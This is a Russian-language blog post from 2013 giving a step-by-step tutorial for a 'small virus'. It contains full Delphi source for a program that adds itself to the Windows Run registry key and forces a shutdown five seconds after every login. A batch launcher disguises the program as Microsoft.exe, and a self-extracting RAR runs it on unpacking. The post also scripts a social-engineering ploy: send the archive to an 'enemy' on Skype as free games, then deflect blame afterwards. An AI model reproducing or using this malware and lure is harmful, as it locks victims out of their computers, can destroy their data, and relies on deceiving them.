---
title: "Маленький вирусиГ"
description: "И так, писать много не буду, т.к. лень..., начнем:Сам вирус (он будет состоять из 2 частей, exe файл..."
author: "huzrus"
published: "2013-02-03T09:46:33+00:00"
modified: "2013-02-03T09:46:33+00:00"
locale: "ru"
canonical_url: "https://yvision.kz/post/malenkiy-virusig-318282"
markdown_url: "https://yvision.kz/post/malenkiy-virusig-318282/markdown"
site_name: "Yvision.kz"
---

# Маленький вирусиГ

> И так, писать много не буду, т.к. лень..., начнем:Сам вирус (он будет состоять из 2 частей, exe файл...

И так, писать много не буду, т.к. лень..., начнем:Сам вирус (он будет состоять из 2 частей, exe файла и батника (*.bat)), создадим текстовый документ, меняем имя "Текстовый документ.txt" на "virys.bat" (virys - это обычное имя файла, так что можете его назвать, как душе угодно). Потом нажимаете на файле (в моем случае, это virys.bat), правую кнопку и нажимаете "Изменить", в открывшемся окне пишем:start gamesMicrosoft.exeВСЕ. (1 часть законченна)).2 часть (это exe файл), будем програмировать (на делфи (Delphi)), откроем делфи, и просто "тупо" скопируем текст, который я даю, он очень маленький, так как состоит из 1 строчки + моя статья "автозагрузка" (тоесть сам вирус - это ВСЕГО ТО 1 строчка кода, а еще парочку строчек, которые работают с реестром, тоесть автозагрузка, чтобы наша прога при выключении / перезагрузке компа включалась).Вот сам код:unit Unit1;interfaceusesWindows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,Dialogs, Registry, StdCtrls, XPMan, ExtCtrls;typeTForm1 = class(TForm)Button1: TButton;XPManifest1: TXPManifest;Timer1: TTimer;Label1: TLabel;procedure FormCreate(Sender: TObject);procedure Button1Click(Sender: TObject);procedure Timer1Timer(Sender: TObject);private{ Private declarations }public{ Public declarations }end;varForm1: TForm1;implementation{$R *.dfm}procedure TForm1.FormCreate(Sender: TObject);varreg: TRegistry;path: String;beginTimer1.Enabled:=True;// Form1.Left:=-5000;path:=Application.ExeName;reg:=Tregistry.Create;reg.RootKey:=HKEY_CURRENT_USER;if(reg.OpenKey('SoftwareMicrosoftWindows' + 'CurrentVersionRun', True)) then beginreg.WriteString('ViryS by V1S', path);reg.CloseKey;reg.Free;end;end;procedure TForm1.Button1Click(Sender: TObject);beginClose;end;procedure TForm1.Timer1Timer(Sender: TObject);beginWinExec('shutdown -s -f -t 5 -c "IIoJIb3oBaTeJIb, Bbl JIaMEP, IIoEToMy KoMII ceu4ac BblKJIlO4uTC9, c YBA}i{eHueM, V1S, 4yTb He 3a6blJI, y Bac ec4o ECTb 5 ceK.))))"', 0);Timer1.Enabled:=False;end;end.И так, с кодом разобрались, сейчас объясню:на форму ставим таймер (вкладка System), кнопку (Button, вкладка Standart),Лайбел (Label, вкладка Standart), ну можно оставить еще манифес (вкладка Win32);Обьясняю (для тех, кто в танке), кнопка будет служить всего лишь для выключение этой проги (я б ее вообще не ставил, сама кнопка просто для прикола), лайбел тоже не надо (но например я на ней написал: ЖИЗНЬ ПРЕКРАСНА, пока человек будет радоваться, типо "жизнь прекрасна", вирус все сделает, что надо).Все (2 часть с EXE файлом закончена, сохраняем и компилируем (Ctrl+F9))!!!!ОБЯЗАТЕЛЬНО (не F9, а именно Ctrl+F9).Это дает то, что при компиляции программа (в нашем случае вирус НЕзапуститься, но создаст сам exe файл + когда вы это сделаете, переименуйте файл Project1.exe в файл Microsoft.exe).Потом создаем где угодно (например на рабочем столе) папку "games" и в нее (в папку) кидаем 2 файла (virys.bat, и Microsoft.exe).После этого запускаем Rar, на папке games правая кнопка / "Добавить в архив..." (архиватор, он обычно у всех есть), и ставим галочку во вкладке "Общие", создать SFX архив, переходим на вкладку "Дополнительно" и нажимаем "Параметры SFX...", и в вкладке "Общие" (в "параметрах SFX архива")"Выполнить после распаковки" пишете:gamesvirys.bat ВСЕ, нажимаете "ОК" и этот архив на своем компе НЕраспоковывайте, так как после распаковки СРАЗУ (даже если пользователь НЕЧЕГО не нажимал запускаеться файл virys.bat, а этот файл запускает файл Microsoft.exe, который будет выключать комп пользователю ВСЕГДА в течении 5 сек., и закрыть это НЕЛЬЗЯ!!!).Вот этот маленький вирус, который вырубить нереально, я например НЕ смог его отключить... (так как у меня было 2 пользователя и оба администраторы, то я просто удалил пользователя, который загружал вирус и сделал нового пользователя тоже админа, но при этом я потратил время, + все мои файлы в документах и рабочего стола УДАЛИЛИСЬ и я их так и е вернул)...Ну когда вы сделаете все как тут написано, то просто пишете (например вашему врагу, который есть в скайпе (или асе, т.д.)):Имя вашего врага, привет, я нашол игры, такие классные!!! поверь мне!тебе скинуть?допустим он говорит конечно кидай!Вы кидаете, он разпаковывает (пофигу куда) и все. Считайте у него покрайней мере этого пользователя НЕТУ.Ну потом он вас конечно будет ругать типо чо за вирус ты мне скинул (а вы говорите, ты что ламер, у тя что антивиря нету? он говорит: есть, но то что ты мне скинул не вирус, потому как его мой антивирь не видел...), ну вы говорите, это наверно изза того, что ты как то не правильно разархивировал, и типо у вас все работает или что то в этом роде придумаете... УДАЧИ!.Если возникнут проблемы, предложения, пишите:1) azzik2222@ya.ru ;2)v1s.xaker.ru ;(Это были Email 'ы)))

**[Уроки для хакеров и программистов](http://itblogs.org/)**

---

Source: [https://yvision.kz/post/malenkiy-virusig-318282](https://yvision.kz/post/malenkiy-virusig-318282)